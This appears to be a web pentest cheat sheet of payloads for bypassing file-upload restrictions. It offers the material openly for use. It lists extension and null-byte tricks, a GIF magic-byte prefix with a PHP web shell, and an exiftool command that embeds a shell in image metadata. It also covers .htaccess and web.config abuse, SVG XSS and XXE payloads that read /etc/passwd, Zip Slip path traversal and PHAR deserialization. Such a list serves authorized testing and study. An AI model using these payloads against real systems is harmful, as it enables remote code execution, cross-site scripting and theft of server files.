web-pentest

File Upload Bypass

Bypass file-upload restrictions to reach RCE/XSS — extension and MIME/magic-byte tricks, .htaccess/web.config abuse, SVG/HTML/XXE uploads, path traversal and parser/deserialization bugs.

Jun 2026, lazyhackers
Extension Tricks (8)
shell.php.jpg
Double extension — misconfigured servers execute the .php
extension double
shell.pHp
Case variation to dodge a lowercase blacklist
extension case
shell.phtml
Alternate PHP extension that extension filters often miss
extension php
shell.php5
Legacy PHP extension mapping
extension php
shell.phar
PHP archive — executed as PHP
extension phar
shell.php%00.jpg
Null-byte truncation (old PHP / CGI)
extension nullbyte
shell.php.
Trailing dot stripped by Windows, leaving .php
extension windows
shell.asp;.jpg
IIS semicolon trick — treated as .asp
extension iis
MIME & Magic Bytes (4)
Content-Type: image/jpeg
Spoof the MIME header while uploading a script
mime header
GIF89a;<?php system($_GET[0]);?>
GIF magic-byte prefix + PHP payload
magicbyte gif
exiftool -Comment='<?php system($_GET[0]);?>' image.jpg
Embed PHP in a real image's EXIF comment
magicbyte exif
prepend \xFF\xD8\xFF before <?php ... ?>
JPEG magic bytes to pass content sniffing
magicbyte jpeg
Server Config Upload (3)
.htaccess -> AddType application/x-httpd-php .jpg
Upload .htaccess so .jpg runs as PHP (Apache)
htaccess apache
.htaccess -> php_value auto_prepend_file shell.gif
Prepend an uploaded "image" as PHP
htaccess apache
web.config -> add ASP/ASPX handler
Upload web.config to enable script exec on IIS
iis webconfig
SVG / HTML / XML (4)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Stored XSS via an uploaded SVG
svg xss
<svg><script>alert(1)</script></svg>
SVG script execution
svg xss
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/passwd">]><svg>&x;</svg>
XXE via an uploaded SVG
svg xxe
shell.html containing <script>...</script>
HTML upload → stored XSS on the same origin
html xss
Path & Overwrite (3)
../../../var/www/html/shell.php
Path traversal in the filename to control where it lands
path traversal
archive with ../../shell.php (Zip Slip)
Extraction path traversal via a crafted archive
zipslip archive
filename=config.php
Overwrite a sensitive file by reusing its name
overwrite
Parser & Deserialization (2)
phar://uploaded.phar/x
Trigger PHAR deserialization on a later file operation
phar deserialization
malicious.gif (ImageMagick MSL / Ghostscript)
Image-parser RCE (ImageTragick-class bugs)
imagemagick rce